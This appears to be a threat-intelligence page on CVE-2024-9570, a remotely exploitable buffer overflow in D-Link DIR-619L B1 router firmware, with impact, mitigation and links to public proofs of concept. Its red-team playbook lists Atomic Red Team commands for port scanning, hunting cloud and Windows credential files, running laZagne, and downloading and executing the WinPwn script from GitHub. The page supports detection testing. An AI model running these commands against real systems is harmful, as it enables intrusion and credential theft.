CVE-2024-9570
Overview
This vulnerability is a buffer overflow caused by improper handling of the curTime argument in the formEasySetTimezone function within the /goform/formEasySetTimezone endpoint of the D-Link DIR-619L B1 firmware version 2.06b1. The root cause is insufficient bounds checking on user-supplied input, leading to memory corruption in the device's timezone configuration processing component.
Vulnerability Description
A vulnerability was found in D-Link DIR-619L B1 2.06 and classified as critical. Affected by this issue is the function formEasySetTimezone of the file /goform/formEasySetTimezone. The manipulation of the argument curTime leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
Impact
An attacker with network access and low privileges can exploit this vulnerability remotely without user interaction to execute arbitrary code with elevated privileges on the affected device. This can result in full compromise of the device, including unauthorized control over network traffic and device configuration. The CVSS vector (AV:N/AC:L/PR:L/UI:N) indicates remote network attack with low complexity and no user interaction, requiring only limited privileges, thus increasing the attack surface and potential for lateral movement within internal networks.
Solution
D-Link has acknowledged this vulnerability affecting DIR-619L B1 firmware version 2.06b1. Users should apply the latest firmware update provided by D-Link that addresses this buffer overflow issue. Detailed patch instructions and firmware downloads are available at https://vuldb.com/?id.279464. If immediate patching is not feasible, restricting network access to the device’s management interface is recommended as a temporary mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the D-Link DIR-619L B1 router firmware version 2.06, specifically within the function responsible for setting the timezone. The flaw arises from improper handling of the `curTime` argument, which can lead to a buffer overflow condition. This occurs when the input data exceeds the allocated buffer size, causing adjacent memory locations to be overwritten. Such a memory corruption issue can potentially allow an attacker to execute arbitrary code, gain unauthorized access to the device, or disrupt its normal operation. The nature of this vulnerability is particularly concerning as it can be exploited remotely, enabling attackers to target devices over the internet without requiring physical access.
The attack vectors associated with this vulnerability are diverse, primarily leveraging the router's web interface. An attacker could craft a malicious HTTP request that includes a specially formatted `curTime` parameter. By sending this request to the vulnerable endpoint, the attacker can trigger the buffer overflow. Given that the attack can be executed remotely, it poses a significant risk to any network utilizing the affected router. Scenarios may include an attacker gaining control of the router, redirecting traffic, intercepting sensitive data, or even using the compromised device as a launchpad for further attacks within the local network.
The real-world impact of this vulnerability is substantial, particularly for small to medium-sized businesses that rely on D-Link routers for their networking needs. If exploited, the consequences could range from unauthorized access to sensitive information to complete network compromise. Such incidents could lead to data breaches, financial losses, and reputational damage. Furthermore, the public disclosure of this vulnerability increases the urgency for organizations to address the issue, as it provides potential attackers with the necessary information to exploit unpatched devices. The high CVSS score of 8.8 underscores the critical nature of this vulnerability and the need for immediate attention.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to monitor network traffic for unusual patterns that may indicate an attempted exploitation of the vulnerability. Intrusion detection systems (IDS) can be configured to alert administrators of suspicious activity targeting the router. Additionally, organizations should ensure that their D-Link DIR-619L routers are updated to the latest firmware version, which may include patches addressing this vulnerability. If an update is not available, consider isolating the affected device from the network or replacing it with a more secure alternative. Regular security audits and vulnerability assessments can also help identify and remediate potential weaknesses in the network infrastructure.
In conclusion, the vulnerability in the D-Link DIR-619L B1 router firmware presents a significant threat to users and organizations. Its ability to be exploited remotely, combined with the potential for severe consequences, necessitates immediate action. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this critical vulnerability.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-9570, with new telemetry indicating the emergence of initial attack campaigns leveraging publicly available proof-of-concept exploits. Although the EPSS score shows a slight decline, this metric does not yet reflect the increased operational activity observed across our sensors. The appearance of active exploitation signals a transition from theoretical risk to tangible threat, underscoring the vulnerability’s growing attractiveness to threat actors. This shift elevates the urgency for defenders to prioritize detection and response capabilities, as the exploitation can lead to remote code execution and potential full compromise of affected D-Link DIR-619L B1 devices. The evolving landscape suggests that adversaries may be integrating this vulnerability into broader attack frameworks, increasing the likelihood of targeted intrusions and lateral movement within compromised networks.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dir-619l Firmware | 2.06b1 |
cpe:2.3:o:dlink:dir-619l_firmware:2.06b1:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
dylvie/CVE-2024-9570_D-Link-DIR-619L-bof
Exploit for CVE-2024-9570
|
dylvie | 6 | 3 | 2024-10-11 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-9570 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.279464 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.279464 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.414548 |
| github.com |
GitHub CVE
exploit
|
https://github.com/abcdefg-png/IoT-vulnerable/blob/main/D-Link/DIR-619L/formEasySetTimezone.md |
| dlink.com |
GitHub CVE
product
|
https://www.dlink.com/ |